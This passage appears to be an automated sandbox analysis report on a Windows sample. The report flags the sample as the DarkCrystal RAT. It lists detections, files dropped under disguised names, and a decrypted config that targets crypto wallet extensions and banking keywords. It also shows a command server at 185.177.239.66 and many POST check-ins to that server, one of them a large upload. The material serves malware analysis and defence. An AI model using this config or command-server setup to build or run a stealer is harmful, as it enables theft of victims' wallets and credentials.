                          Source: C:\Users\user\Desktop\QXRfkjyW.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\SDpvGwhv.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\UXWdwFYk.logReversingLabs: Detection: 37%
                          Source: C:\Users\user\Desktop\WgiUHyMw.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\XQlMiBJi.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\Zallyypm.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\ZrGvzZJn.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\dVnCFeff.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\exStwvKV.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\fSOKaeua.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\kOdTVPKT.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\mHfKTHWS.logReversingLabs: Detection: 15%
                          Source: C:\Users\user\Desktop\pHCSiMBb.logReversingLabs: Detection: 15%
                          Source: C:\Users\user\Desktop\pKSShysD.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\pyJigHPD.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\qwPLRqWX.logReversingLabs: Detection: 29%
                          Multi AV Scanner detection for submitted file
                          Source: 3XtEci4Mmo.exeReversingLabs: Detection: 71%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeJoe Sandbox ML: detected
                          Source: C:\Program Files\Google\Chrome\Application\conhost.exeJoe Sandbox ML: detected
                          Source: C:\Program Files\Google\Chrome\Application\conhost.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: 3XtEci4Mmo.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: 00000000.00000002.1846719384.00000000129F6000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;example.com;any.domain.net","_1":"mail.google.com;example.com;any.domain.net"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"1500","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive","_1":""}}
                          Source: 00000000.00000002.1846719384.00000000129F6000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["448yeouwJcxSHSru9YqksE5Gq7RzFG6bDZt9Fn5z5jp5MGBbIMqPQG8092HgX5rCfWPrjrpWc0pJYA3k5zr2arK7b2AMgYc91nZ01T2ahUwaayb88gkhOymyLRQqrc0E","f56d71433bb0e2fb950c932b49352e3f9208d708a9a063f95da637203ff919b0","0","test","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                          Source: 00000000.00000002.1846719384.00000000129F6000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://185.177.239.66/javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/","eternalHttpwindowsUploadsDownloadstemporary"]]
                          Source: 3XtEci4Mmo.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exeJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\78fe9fe6f28b21Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDirectory created: C:\Program Files\Google\Chrome\Application\conhost.exeJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDirectory created: C:\Program Files\Google\Chrome\Application\088424020bedd6Jump to behavior
                          Source: 3XtEci4Mmo.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeCode function: 4x nop then jmp 00007FFD9B8A1DB6h0_2_00007FFD9B89086A
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh0_2_00007FFD9BA4BECD

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49955 -> 185.177.239.66:80
                          Uses ping.exe to check the status of other devices and networks
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: Joe Sandbox ViewASN Name: M247GB M247GB
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 384Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 1636Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2592Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2084Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2084Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: multipart/form-data; boundary=----gVbqWoHIFdWLMV08sQ1qNt1HbxRCSaJRobUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 98742Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2192Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2592Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2192Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2592Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
